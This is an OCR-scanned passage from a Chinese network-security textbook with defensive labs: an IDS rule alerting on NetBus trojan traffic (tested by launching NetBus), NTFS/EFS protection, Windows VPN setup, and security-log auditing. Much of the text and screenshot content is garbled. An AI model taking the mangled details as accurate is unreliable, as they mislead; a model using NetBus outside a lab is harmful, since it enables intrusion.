哩 upp'lso 2,625 1.951 
学 Host Name Server 468 0.363 

NETBIOS Name Servic,,, 38,378 28.518 
es 2 zl 
| » |"\ Ghents > Servers > Users 和 Recent activiy 》、 Other services I I»| 
For Help, press Fl Tracngactive 元 
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步骤 四 在 Session Wall 的 工具 栏 中 ， 单 击 安全 检测 图 标 按钮 ， 打 开 Detected security 
Violations 窗口 ， 查 看 提示 信息 ， 如 图 12-77 所 示 。 


Smurf (Pong) at... Mon, Apr 07,20:30 。 Mon, Apr 07,20:30 。 Pong attack again... 


12-77 ”Detected security violations 窗口 
步骤 五 ”关闭 Detected security violations 窗口 ， 然 后 关闭 Session Wall。 
Session Wall 可 以 用 来 充当 实时 监测 系统 ， 其 直接 的 图 标 报警 方式 较为 直观 ， 而 且 其 检 
测 结果 非常 友好 、 易 于 分 析 ， 有 助 于 网 络 安全 审计 人 员 迅 速 做 出 反应 。 


D 
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12.12.2 ”在 Session Wall-3 中 创建 、 设 置 审计 规则 实 训 

一 、 实 训 目 的 

学 习 在 Session Wall-3 中 创建 和 设置 审计 规则 的 方法 。 

二 、 实 训 环境 

两 台 预 装 Windows 2000 服务 器 版 或 标准 版 的 计算 机 , 计算 机 间 通 过 网 络 相连 。 也 可 用 
虚拟 机 组 建 实 训 环 境 。 

三 、 实 训 内 容 和 步骤 

步骤 一 ”打开 Session Wall-3， 选 择 Functions | Intrusion Attempt Detection Rules， 打 开 
如 图 12-78 所 示 的 窗口 。 


癌 Intrusion Attempt Detection Rules -IDIxl 


[SE [intrusion 
[Se Tusion 2 让 2 
Any Any Unuusion Drion 
station station detection: 
Any Tusion es 
station detectior: detection: 


Am Any [ntusion A ntrusion 
station station delection “7 delectior 


Any Any [intrusion [intrusion 
station station detechon detectior: 
Any Am A Imusion /7 lnwsion A 


图 12-78 Instrusion Attempt Detection Rules 窗口 


步骤 二 ”在 打开 的 窗口 中 单 击 左下 角 的 Edit Rules 按钮 ,选择 New | Insert before 命令 ， 
如 图 12-79 所 示 。 


[sw wa 
Delete 
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12-79 选择 命令 
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步骤 三 ”输入 NetBus 作为 标识 名 称 ， 按 Enter 键 确认 。 注 意 ， 以 NetBus 命名 并 不 是 
必须 的 ， 但 可 以 标示 规则 的 功用 : 用 来 监视 NetBus 活动 。 

步骤 四 “在 出 现 的 Client 对 话 框 中 ， 选 择 RANGE。 这 一 步 是 用 来 确定 规则 所 起 作用 
的 主机 的 他 地址 的 范围 ， 如 图 12-80 所 示 。 


辕 
@ hny station 


Add .. | Benove” | operties. | 
A | Li 
有 


12-80 ”Client 对 话 框 


步骤 五 ” 单 击 Add 按钮 ， 打 开 Select Network Object Type 对 话 框 ， 如 图 12-81 所 示 。 

步骤 六 ”选择 RANGE, 然后 单 击 Add 按钮 打开 RANGE Properties 对 话 框 , 如 图 12-82 
所 示 。 在 Name 文本 框 中 输入 Partners， 即 将 范围 名 称 命名 为 Partners，IP Range 选项 组 中 
分 别 输入 自己 的 了 P 地 址 和 合作 伙伴 的 人 P 地 址 ， 然 后 单 击 OK 按钮 ， 在 出 现 的 对 话 框 中 单 
击 “ 下 一 步 ” 按 钮 。 


Network object 


Ime FE 
IT hang 一 一 
| 
| 
AE 
mw | wp | 
12-81 Select Network Object Type 对 话 框 12-82 “RANGE Properties 对 话 框 


步骤 七 ”在 出 现 的 如 图 12-83 所 示 的 Server 对 话 框 中 ， 选 中 Any station， 单 击 “下 一 
步 ” 按 钮 ， 进 入 Type 对 话 框 ， 

步骤 八 _ 拖 动 列表 框 的 滚动 条 ， 找 到 Intrusion detection: NetBus Traffic 项 后 ， 加 亮 显 
示 ， 如 图 12-84 所 示 。 


加 
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图 12-84 Type 对 话 框 


步 又 九 ” 单 击 Properties 按钮 ， 该 规则 的 原始 定义 与 设置 就 显示 在 弹出 的 对 话 框 中 , 如 
12-85 所 示 。 单 击 OK 按钮 关闭 窗口 ， 然 后 在 Type 对 话 框 中 单 击 “ 下 一 步 ” 按 钮 继续 。 
步骤 十 进入 到 Action 对 话 框 后 ,选择 Log Tt 图标 以 记录 NetBus 活动 情况 ,如 图 12-86 
所 示 。 
步骤 十 一 ” 单 击 Properties 按钮 ， 然 后 在 弹出 的 对 话 框 中 选中 Windows NT Event Log 
复 选 框 , 在 Event 文本 框 中 输入 一 个 文本 字符 串 作 为 在 检测 到 NetBus 活动 时 发 出 警报 的 文 
字 ， 单 击 OK 按钮 ， 如 图 12-87 所 示 。 然 后 单 击 “ 下 一 步 ”按钮 继续 。 


图 12-87 Action Properties 对 话 框 
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步骤 十 二 ”进入 到 Time 对 话 框 后 ， 确 定 Always 复 选 框 被 选中 ， 如 图 12-88 所 示 ， 然 
后 单 击 “ 下 一 步 ”按钮 。 在 Description 对 话 框 中 ,输入 一 个 描述 名 称 ， 然 后 单 击 “ 下 一 步 ” 
按钮 ， 在 User Properties 对 话 框 中 输入 自己 当前 的 登录 名 与 密码 ， 如 图 12-89 所 示 。 


Os 


Days of the wesk 一 一 一 一 一 一 
Won | Tae | tea | Thn |Fri | sat | sm 
Tine frane 
Stet [m0:%m 汪 
Einish |23 : 59 习 FF After midnis 


o@ 庆 一 
Pasoor [站 
Confim password: [ 


mW | ww | cn | wp | 
12-88 Time 对 话 框 12-89 ”User Properties 对 话 框 


步骤 十 三 ” 单 击 Finish 按钮 ，Intrusion Attempt Detection Rules 对 话 框 中 将 显示 刚 定义 
的 NetBus 规则 ， 如 图 12-90 所 示 ， 单 击 OK 按钮 。 接 下 来 将 对 NetBus 规则 定义 进行 测试 。 


Sm 


detection: 


nusion nen 
detectior 


Always 产生 atack 


Re lays Mhn atack 


Edit Rules... ”| Ca | Concel nelp | 另 
12-90 ”完成 对 话 框 


步骤 十 四 “最 小 化 Session Wall， 打 开 NetBus， 建 立 一 个 连接 。 最 小 化 NetBus， 同 时 
最 大 化 Session Wall， 选 择 View | AlertMessage， 或 者 单 击 Show Alert Messages 按钮 ， 双 击 
所 显示 的 关于 NetBus 连接 的 警报 信息 ， 查 看 详细 信息 。 


当 洲 落 煌 半 ”车 涟 民 侠 上 革 儿 到 招 卫 


TT 第 12 曹 奖 原 龙 蓄 动 乡 


12.13 “Windows 文件 系统 安全 实 训 


一 、 实 训 目 的 
NTFS 权限 设置 是 Windows 文件 系统 安全 的 基础 ， 而 EFS 则 被 认为 是 除 NTFS 之 外 的 
第 二 层 保护 。 当 要 访问 一 个 已 被 EFS 加 密 的 文件 时 , 用 户 必 须 同时 拥有 访问 该 文件 的 NTFS 
权限 和 解密 密 钥 .本 实 训 主要 通过 NTFS 权限 设置 和 EFS 密 钥 备份 来 提高 读者 保护 Windows 
文件 系统 安全 的 技能 。 
二 、 实 训 环 境 
具有 NTFS 分 区 的 、 预 装 有 Windows XP 操作 系统 的 计算 机 一 台 。 
三 、 实 训 内 容 和 步骤 


1. NTFS 权限 设置 

步骤 一 ”以 Administrator 帐户 登录 到 Windows XP 操作 系统 。 

步骤 二 ”打开 “资源 管理 器 ”， 在 一 个 NTEFS 分 区 下 建立 新 文件 夹 ， 如 D:/test。 

步骤 三 ” 右 击 test 文件 夹 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,打开 “test 属性 ” 
对 话 框 ， 在 该 对 话 框 中 切换 到 “安全 ”选项 卡 ， 如 图 12-91 所 示 。 


图 12-91 “安全 ”选项 卡 

步骤 四 在 “组 或 用 户 名 称 ” 列 表 框 中 ， 选 择 Users 组 ， 然 后 单 击 “ 删 除 ” 按 钮 ， 此 
时 将 出 现 如 图 12-92 所 示 的 消息 框 , 提示 不 能 删除 Users 组 , 因为 该 对 象 正在 从 它 的 父 文件 
夹 那里 继承 权限 ， 单 击 “确定 ”按钮 ， 关 闭 该 消息 框 。 


@ 
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En “Users en ， 修 无 法 删除 此 对 象 。 要 山 B 辽 “Users (ADNIN-DS4A854DA\Vsers)”， 
Users ADITN-DS4A3S ADA\Users)"” 


12-92 ”安全 消息 框 
步骤 五 ” 单 击 “ 高 级 ”按钮 进入 高 级 设置 对 话 框 ， 取 消 选 中 “从 父 项 继承 那些 可 以 应 
用 到 子 对 象 的 权限 项 目 ， 包 括 那 些 在 此 明确 定义 的 项 目 。” 复 选 框 ， 以 阻止 权限 的 继承 ， 
如 图 12-93 所 示 。 此 时 出 现 一 个 消息 框 ， 提 示 你 或 者 将 当前 继承 来 的 权限 复制 到 该 文件 夹 ， 
或 者 从 该 文件 夹 中 删除 除了 明确 指定 的 权限 之 外 的 所 有 权限 ， 如 图 12-94 所 示 。 
test 的 高 级 安全 设置 


[要 “| 证 核 “| 所 有 者 | 有效 机 限 
要 想 查看 有 关 “特殊 权限 ”的 洋 细 信 息 ， 请 选择 一 个 权限 项 目 ， 然 后 单 击 “ 编 辑 ”。 


Administrators ..。 完全 控制 
SYSTEN 


Adninistrator ( 

CREATOR OWNER 

Vsers (ADMIN-DS. 该 文件 夹 ， 子 文件 
Users (ADNIN-D5... 特殊 该 文件 夹 及 子 文件 夹 | 


口 用 在 此 显示 的 可 以 应 用 到 子 对 象 的 项 目 苦 代 所 有 子 对 象 的 权限 项 目 E) 


12-93 ”高 级 安全 设置 


生生 TSWR 区 用 到 AH 扫 的 父 项 权限 顶 目下 全 应 用 到 这 个 对 
本 ， 请 单 击 “ 复 


二 院 上 前 应 用 的 权限 项 目 并 只 保留 在 这 儿 明 确定 义 的 权 


-要 取消 这 个 操作 ,请 单 击 “取消 ”。 
WO | [Lo |] 


12-94 ”阻止 继承 消息 框 
步骤 六 ” 单 击 “复制 ”或 “删除 ”按钮 后 ， 回 到 “安全 ”选项 卡 ， 再 次 删除 Users 组 ， 
则 删除 成 功 。 
步骤 七 ”在 “组 或 用 户 名 称 ” 列 表 框 中 ， 选 择 Administrators 组 ， 修 改 其 权限 ， 拒 绝 
“ 读 取 ” 权 限 ， 如 图 12-95 所 示 。 


潼 洲 车手 半 ” 合 涟 民 侣 村 者 到 沼 到 
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步骤 八 关闭 属性 对 话 框 ， 再 次 双击 打开 test 文件 夹 ， 将 出 现 拒绝 访问 的 错误 提示 ， 
如 图 12-96 所 示 。 


第 规 


组 或 用 户 名 称 (@) 

Administrator (ADIMNIN-DS4ABS4DA\Administrator) 
| 最 Aninistrators (DMTN-DS4ABS4DA\Adninistrators) 
CREATOR omrER 

sts 

RB Users ODNTN-DS4A54DA\Users) 


Adninistrators 的 权限 里) 


回 口 口 口 口 口 | 千 


特别 权限 或 高 约 设 置 ,请 单 击 “ 高 级 ”。 


Lamw ] 
12-95 ”修改 权限 12-96 ”拒绝 访问 提示 
2. 备份 EFS 密 钥 


步 又 一 ”选择 “开始 ”|“ 运 行 ”命令 ， 在 “运行 ”对 话 框 中 输入 mme 打开 控制 台 管 
理 器 ， 依 次 选择 “文件 ”|“ 添 加 /删除 管理 单元 ”命令 ， 弹 出 “添加 /删除 管理 单元 ”对 话 
框 ， 如 图 12-97 所 示 。 

添加 /删除 管理 单元 
[RR | 
使 用 此 页 来 添加 或 删除 控制 台 的 管理 单元 。 
疙 理 间 元 未 加 到 G6): 各 区 下 于 二 本 


添加 0).. 各 除 邓 ) 


图 12-97 添加 管理 单元 
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步骤 二 ”在 “添加 /删除 管理 单元 ”对 话 框 中 单 击 左 下 角 的 “添加 ”按钮 ， 弹 出 “添加 
独立 管理 单元 ”对 话 框 ， 如 图 12-98 所 示 。 


添加 独立 管理 单元 


Mierosoft Corpors- 
Microsoft Corpora 
Mierosoft Corpors- 
Mierosoft Corpora .. 
Microsoft Corpors. 
Microsoft Corpora 
Mierosoft Corpers- 
Microsoft Corpors 
Microsoft Corpora .， 属 


roma. — 人 hinet 


[Cw] (© ] 


图 12-98 “添加 独立 管理 单元 ”对 话 框 
步骤 三 ”在 “添加 独立 管理 单元 ”对 话 框 中 选中 “证 书 ”管理 单元 ， 然 后 单 击 “ 添 加 ” 
按钮 ， 弹 出 “证 书 管 理 单元 ”对 话 框 ， 如 图 12-99 所 示 。 
证 书 管理 单元 


膏 理 单元 格 终 为 下 列 帐户 管理 证 书 : 
OR PR 


图 12-99 证 书 管理 单元 


步骤 四 “在 “证 书 管理 单元 ”对 话 框 中 ， 分 别 选中 “我 的 用 户 帐 户 ” 和 “计算 机 帐户 ” 
单 选 按钮 ， 完 成 添加 ， 效 果 如 图 12-100 所 示 。 


潼 洲 车 粕 半 ” 攻 涟 开创 上 村 者 到 招 到 


潍 


12 前 及 厅 芭 能 明 经 
法 加 / 副 除 管理 单元 


独立 | 扩展 | 


使 用 此 页 来 添加 或 删除 控制 台 的 管理 单元 。 


管理 单元 添加 到 G) : | 国 控制 台 根 节点 。 


图 证 书 - 当前 用 户 
芭 证 书 条 地 计算 机 ) 


ED [| BR | [关于 四 


记 枉 [天 
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步骤 五 ”再 次 打开 控制 台 管理 器 ， 依 次 展开 “证 书 -当前 用 户 ” 一 “个 人 ”一 “证 书 ” 
节点 ， 可 以 看 到 用 户 的 加 密 密 钥 ， 如 图 12-101 所 示 。 


名 让 书 


由 凶 受信 任 的 根 证 书 颁发 机 构 
信任 


12-101 用 户 证 书 


步骤 六 ”选中 用 户 证 书后 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “所 有 任务 ”|“ 导 出” 命令， 
进行 证 书 的 备份 操作 ， 如 图 12-102 所 示 。 


步骤 七 ”在 打开 的 证 书 导出 向 导 中 ， 单 击 “ 下 一 步 ” 按 钮 ， 在 导出 私 钥 框 中 选择 “是 ， 
导出 私 铀 ”， 继 续 单 击 “ 下 一 步 ”按钮 ， 在 出 现 的 密码 框 中 输入 密码 。 

步骤 八 _ 输 入 密码 后 ， 继 续 单 击 “ 下 一 步 ”按钮 ， 在 出 现 的 要 导出 的 文件 框 中 输入 文 
件 名 ， 单 击 “ 浏 览 ”按钮 ， 设 定 文件 保存 路 径 。 再 次 单 击 “ 下 一 步 ”按钮 ， 便 完成 了 密 钥 
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的 导出 备份 ， 如 图 12-103 所 示 。 


文件 区 ) 操作 查看 WW) 收藏 夹 @) ”窗口 人 @) 帮助 00 
了 外国 | 虹 | X 甸 


户 \ 个 人 \ 证 书 


司 证 书 党 
轨 国 受信 任 的 根 证 书 颁发 机 构 天 
相国 企业 信任 驶 切 四 ) 用 新 密 钥 申请 证 书 
二 国 中 级 证 书 颁发 机 构 复制 必 ) 用 相同 密 钥 申 请 证 书 
由 国 Active Directory 用 户 对 出 除 O) 用 新 客 钼 续 订 证 书 ， 
由 国 受信 任 的 发 行者 二 - Y 


hap 
属性 @) 用 相同 密 胃 续 订 证 书 . 


帮助 0) 


由 - 国 第 三 方 根 证 书 颁发 机 构 
由 - 国 受信 任 人 


12-102 导出 证 书 


正在 完成 证 书 导出 向 导 


您 已 成 功 地 完成 证 书 导出 向 导 。 
您 已 指定 下 列 设置 : 

文件 名 C:\Documents and Se 
导出 密 钥 

包括 证 书 路 径 中 所 有 证 书 否 
文件 格式 


个 人 信息 交换 (+. pfx) 


图 12-103 完成 导出 
12.14 Windows 系统 VPN 的 实现 实 训 


一 、 实 训 目 的 


虚拟 专用 网 络 (Virtual Private Network, VPN) 是 专用 网 络 的 延伸 , 它 包 含 了 类 似 Intermet 
的 共享 或 公共 网 络 链接 。 通 过 本 实 训 ， 使 学 生 加 深 对 VPN 的 认识 。 


二 、 实 训 环 境 
- 台 Windows 2003 VPN 服务 器 (能 与 Internet 相连 )、 一 台 Windows 2003 客户 端 (XP 


堂 沙 若 糖 玫 ”车 以 天价 有 外 也 强 巴 


也 可 以 )， 两 台 计 算 机 组 成 局 域 网 并 互通 。 
三 、 实 训 内 容 和 步骤 
1. 启动 VPN 服务 器 
步骤 一 ”依次 选择 “开始 ” |“ 管理 工具 ”|“ 路 由 和 远程 访问 ”， 打 开 “ 路 由 和 远程 访 
问 ” 服 务 窗口 ， 再 在 窗口 右边 右 击 本 地 计算 机 名 ， 在 弹出 的 快捷 菜单 中 选择 “配置 并 启用 
路 由 和 远程 访问 ”命令 ， 如 图 12-104 所 示 。 
区 四 


图 12-104 ”路 由 和 远程 访问 


步骤 二 ”在 出 现 的 配置 向 导 对 话 框 中 单 击 “ 下 一 步 ”按钮 ， 进 入 服务 选择 设置 界面 ， 
如 图 12-105 所 示 。 如 果 你 的 服务 器 只 有 一 块 网 不 ， 只 能 选择 “ 自 定义 配置 ” 单 选 按钮 。 


型 和 远程 访问 服务 器 安装 向 导 


您 可 以 启用 下 列 服务 的 任意 组 合 ， 或 者 你 可 以 自 定义 此 服务 器 。 


图 12-105 ”路 由 和 远程 访问 服务 器 安装 向 导 
步骤 三 ”在 “ 自 定义 配置 ”设置 界面 中 ， 选 中 “VPN 访问 ” 复 选 框 。 单 击 “ 下 一 步 ” 
按钮 ， 如 图 12-106 所 示 。 
步骤 四 “配置 向 导 完 成 ， 弹 出 如 图 12-107 所 示 的 消息 框 。 单 击 “是” 按钮， 启动 VPN 


服务 。 
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步骤 五 启动 了 VPN 服务 后 ， 打 开 “ 路 由 和 远程 访问 ”窗口 ， 如 图 12-108 所 示 。 


路 由 和 运程 访问 服务 里 安装 痛 导 


自 定义 配置 
关闭 此 符 导 后 , 悠 可 以 在 路 由 和 远程 访问 控制 台中 配置 选择 的 服务 。 


图 12-107 配置 完成 


| 


此 服务 器 上 配置 了 路 由 和 远程 访问 


此 服务 器 已 理 用 路 日 和 元 各 访问 服 去 天 安 桨 向 皇 流行 了 配置 。 要 对 
兰 前 配置 进 守 更改 ， 请 硅 控 名 树 中 选择 一 个 项 三 ， 然 后 在 “ 提 

作 " 详 单 上 六 击 “ 属 下 ”。 

有 关 实 拓 下 主 和 过 程 访问， 部 署 方案 ， 以 及 妊 检 角 答 的 更 多 信息 ， 

前台 癌 归 由 和 这 各 访问 昌 肝 < 


图 12-108 ”VPN 服务 启动 后 的 “路 由 和 远程 访问 ” 
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2. 配置 VPN 服务 器 


步骤 一 ”在 图 12-108 中 选择 “KENT( 本 地 )” 服 务 器 并 右 击 ， 在 弹出 的 快捷 菜单 中 选 
择 “ 属 性 ”命令 , 在 弹出 的 对 话 框 中 切换 到 了 P 选项 卡 , 在 “IP 地 址 指派 ”选项 组 中 选中 “ 静 
态 地 址 池 ” 单 选 按 钮 。 

步骤 二 单 击 “ 添 加 ”按钮 设置 卫 地 址 范围 ， 这 个 卫 范围 就 是 VPN 局 域 网 内 部 的 虚 
拟 他 地 址 范围 ， 这 里 设置 为 从 10.240.60.1 一 10.240.60.10， 一 共 10 个 他， 默认 的 VPN 服 
务 器 占用 第 一 个 一， 所 以 10.240.60.1 实际 上 就 是 这 个 VPN 服务 器 在 虚拟 局 域 网 的 他， 如 
图 12-109 所 示 。 


万 启用 下 路 出外) 
万 万 许 基 于 P 的 二 和 沪 问 和 清 求 拓 呈 连接 全 
了 地 址 指派 
此 服务 器 指派 I 地 址 使 用 的 是 | 


个 动态 主机 配置 协 议 DIEP) QD 


ase 往 入 一 个 起 迷 苹 地 址 ， 和 结束 IP 地 址 惑 范围 中 的 地 


数目 _ 
起 舱 IP 地 址 G): 10.240.60.1 
结束 IP 地 址 到) 10 .240. 50 . 10 
添加 @). 骨 WD: Py 
Ca ] 


证 启用 广播 名 称 解析 C) 


图 12-109 添加 “静态 地 址 池 ” 

3. 添加 VPN 用 户 

在 管理 工具 中 的 “计算 机 管理 ”里 添加 用 户 ， 这 里 以 添加 一 个 chnking 用 户 为 例 。 

步骤 一 ” 先 新 建 一 个 叫 “chnking” 的 用 户 ， 创 建 好 后 ， 查 看 这 个 用 户 的 属性 ， 在 “ 拨 
入 ”选项 卡 中 做 相应 的 设置 ， 如 图 12-110 所 示 。 

步骤 二 ”在 “远程 访问 权限 ”选项 组 中 选中 “允许 访问 ” 单 选 按钮 ， 以 允许 这 个 用 户 
通过 VPN 拨 入 服务 器 。 

步骤 三 选中 “分 配 静 态 IP 地 址 ” 复 选 框 ， 并 设置 一 个 VPN 服务 器 中 静态 人 P 池 范 围 
内 的 一 个 他 地 址 ， 这 里 设 为 10.240.60.2。 

4. 配置 Windows 2003 客户 端 

步骤 一 选择 “程序 ” |“ 附件”|“ 通 讯 ”|“ 新 建 连接 向 导 ” 命 令 ， 启 动 “ 新 建 连接 向 
导 ”。 在 如 图 12-111 所 示 的 “网 络 连接 类 型 ”设置 界面 中 ， 选 择 第 二 项 “连接 到 我 的 工作 
场所 的 网 络 ”， 这 个 选项 是 用 来 连接 VPN 的 ， 单 击 “ 下 一 步 ”按钮 。 
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图 12-111 ”网络 连接 类 型 
步骤 二 ”在 “网 络 连 接 ” 设 置 界 面 中 ， 选 中 “虚拟 专用 网 络 连接 ” 单 选 按钮 ， 单 击 “ 下 
一 步 ” 按 钮 ， 如 图 12-112 所 示 。 
步骤 三 ”在 “连接 名 ”对 话 框 中 ， 输 入 连接 名 称 szbti， 单 击 “ 下 一 步 ” 按 钮 。 
步骤 四 ”在 “VPN 服务 器 选择 ” 设置 界面 中 , 输入 VPN 服务 器 的 公 网 全， 如 图 12-113 
所 示 。 


新 建 连接 向 导 


203. 185. 145. 121 


图 12-113 ”VPN 服务 器 选择 


步骤 五 完成 连接 。 在 “控制 面板 ”|“ 网 络 连 接 ”|“ 虚 拟 专用 网 络 ” 下 可 以 看 到 刚才 
新 建 的 szbti 连接 ， 如 图 12-114 所 示 。 

步骤 六 选中 szbti 连接 后 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ， 在 弹出 的 对 
话 框 中 切换 到 “网 络 ” 选 项 卡 ， 然 后 选中 “Tnternet 协议 (TCP/IP)”， 单 击 “ 必 性” 按钮， 
在 弹出 的 对 话 框 中 再 单 击 “ 高 级 ”按钮 ， 如 图 12-115 所 示 ， 取 消 选 中 “在 远程 网 络 上 使 用 
默认 网 关 ” 复 选 框 ， 单 击 “ 确 定 ” 按 钮 退出 。 
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图 12-115 新 建 szbti 连接 的 “属性 ”配置 


步骤 七 ”双击 szbti 连接 ,输入 分 配给 这 个 客户 端的 用 户 名 和 密码 ， 找 通 后 在 任务 栏 的 
右 下 角 会 出 现 一 个 网 络 连接 的 图 标 ， 表 示 已 经 拨 入 到 VPN 服务 器 。 


12.15 日 志 分 析 与 安全 审核 实 训 


一 、 实 训 目 的 


为 了 保证 系统 正常 运行 、 准 确 解决 遇 到 的 各 种 各 样 的 系统 问题 ， 认 真 地 分 析 日 志文 件 
和 进行 安全 审核 是 系统 管理 员 的 一 项 非常 重要 的 任务 。 通 过 实时 的 、 集 中 的 、 可 视 化 的 审 
核 ， 能 有 效 地 评估 系统 的 安全 ， 并 及 时 发 现 安全 隐患 。 本 实 训 将 在 Windows 环境 下 对 系统 
登录 事件 进行 审核 ， 增 强 学 生 的 安全 防护 知识 。 


二 、 实 训 环境 


预 装 Windows 2000/XP 的 计算 机 ， 也 可 用 虚拟 机 实 训 环境 。 


三 、 实 训 内 容 和 步骤 
1. 设置 帐户 审核 策略 

使 用 管理 员 身 份 登录 系统 。 
打开 系统 管理 工具 中 的 “本 地 安全 设置 ”。 
进入 “本 地 策略 ”| “审核 策 略 ”， 并 进行 如 表 12-1 所 示 的 设置 ， 设 置 完成 后 
如 图 12-116 所 示 。 


步骤 一 
步骤 二 
步骤 三 


审核 帐户 登录 
审核 帐户 管理 
审核 登录 事件 
审核 策略 更 改 
审核 特权 使 用 
审核 系统 事件 


表 12-1 帐户 审核 策略 设置 


事件 


成 功 ， 
成 功 ， 
成 功 ， 
成 功 ， 


失败 
失败 


失败 
失败 
失败 
失败 


党 12 曹 及 厅 太 能 细 经 


本 地 设置 


文件 (E) 操作 (A) 查看 (W) 帮助 (H) 


”~ 二 | 白 入 加 芝 


六 安全 设置 | 证 咯 安全 设置 
# 国 帐户 第 咯 图 审 核 策略 更 改 成 功 ， 失 改 
5 国 本 地 第 咯 国信 记功， 会 败 

的 | 加 市 核 计 象 访 月 无 宙 入 

5 的 用 户 权利 指派 加 市 核 过 程 这 无 市 术 

w» 的 安全 选项 贺 市 以 目录 服务 访问 大富 核 
a 有 闫 发 
8 全 计算 机 | 节 宙 村 帐 户 学 录 事 件 用功 ， 朱 败 
是 IP 安全 站 略 ， 在 林地 计算 机 | 潮 守 仿 估 户 党 洛 侨 ' 钱 


2. 查看 


步骤 一 
步骤 二 


“安全 性 ”日 志 


12-116 ”本 地 安全 设置 


设置 好 后 , 退出 系统 , 并 以 管理 员 身 份 使 用 错误 的 口令 进行 失败 登录 的 尝试 。 


然后 再 以 管理 员 身 份 使 用 正确 的 口令 登录 系统 。 


步骤 三 
步骤 四 


打开 事件 查看 器 。 


查看 “安全 性 ”日 志 ， 找 出 登录 失败 的 日 志 记 录 ， 如 图 12-117 所 示 ， 


事件 号 对 应 的 描述 如 表 12-2 所 示 。 


中 的 


(CO >》 网络 安全 管理 与 维 扩 


当 洲 落 拆 和 半 ”车 潍 民 侣 上 革 独到 招 卫 


X| 
| ET Es > 加 四 | 时 四 民怨 
村 | Ea 2 证 [用 
加 HN 六 成 功 审核 。 2008-4-13 20:54:51 Security 登录 往 销 528 Administrator 
日 世 不 8 工具 成 功 审核 。 2008-4-13 20:54:51 Securty 帐户 登录 680 SYSTEM 
日 俩 事件 查看 器 失败 审核 。 “2008-4-13 20:54:41 Security 登录 /注销 ”529 SYSTEM 
图 应 用 程序 失败 审核 。 2008-4-13 20:54:41 。 Security 帐户 登录 681 SYSTEM 
加 | os Server 邻 成 功 审核 。 2008-4-13 20:53:26 Securty 详细 追踪 615 Administrators 
名 国 失 败 审 核 。 2008-4-13 20:53:16 Securty 特权 使 用 。 578 Administrator 
系统 国 失 败 审 核 。 2008-4-13 20:53:13 Securty 特权 使 用 。 578 Administrator 
饮 东 统 信 息 邻 成 功 审核 2008-4-13 20:51:49 Securty 策略 改动 ”612 SY5TEM 
中 罚 di 六 成 功 审核 2008-4-13 20:51:49 Securkty 帐户 管理 643 SYSTEM 
昌国 六 沧 邻 成 七 审核 2008-4-13 20:51:44 Securty 策略 改动 612 SYSTEM 
E 设备 管理 器 邻 成 功 审核 。 2008-4-13 20:51:44 Securkty 帐户 管理 643 SYSTEM 
开本 地 用 户 和 组 邻 成 功 审 核 。 2008-4-13 20:51:27 Securty 策略 改动 612 SYSTEM 
9 鱼 向 磁盘 管理 邻 成 功 审核 。 2008-4-13 20:51:27 Securty 帐户 管理 643 SYSTEM 
司 而 总 太 片 整理 程序 。 | 钱 成 功 审 核 2008-4-13 。 205119 。 Secuiy 帐户 管理 643 SYSTEM 
电 还 辑 驱动 器 
由 从 可 移动 存储 
区 服务 和 应 用 程序 


12-117 ”查看 “安全 性 ”日 志 
表 12-2 Window 2000 系统 中 的 重要 事件 


事件 号 描述 
529 登录 失败 的 事件 编号 (在 安全 日 志 中 ) 
6005 Window 2000 重新 启动 的 事件 编号 (在 系统 日 志 中 ) 
6006 系统 正常 关机 的 事件 编号 (在 系统 日 志 中 ) 
6007 因为 权限 不 够 而 导致 非 正常 关机 的 请 求 (在 系统 日 志 中 ) 
6008 “ 非 正 常 关机 ”事件 ， 当 Windows 系统 被 非法 关机 时 ， 该 操作 被 记录 下 来 。 
Pom 记录 工作 系统 的 版 本 号 、 修 建 号 、 补 丁 号 和 系统 处 理 器 的 相关 信息 (在 系统 日 志 
中 ) 


3. 查看 “系统 ”日 志 

步骤 一 ”注销 后 ， 重 新 使 用 管理 员 帐 号 登录 ， 并 查看 “事件 查看 器 ”。 

步骤 二 ”清除 “安全 性 ”和 “系统 ”日 志 。 

步骤 三 ”重新 启动 Windows 2000 系统 ， 并 以 管理 员 身 份 登录 。 

步骤 四 打开 “事件 查看 器 ”查看 “系统 ”日 志 记录 的 信息 ， 如 图 12-118 所 示 。 
步骤 五 ”强制 关闭 (直接 关闭 电源 )Windows 2000 系统 ， 系 统 会 产生 一 个 非法 关机 的 日 


步 对 重新 登录 系统 ， 并 在 “事件 查看 器 ”的 系统 日 志 里 找到 事件 ID 号 为 6008 的 
事件 日 志 ， 如 图 12-119 所 示 。 


图 12-119 ”查看 事件 ID 号 为 6008 的 事件 日 志 
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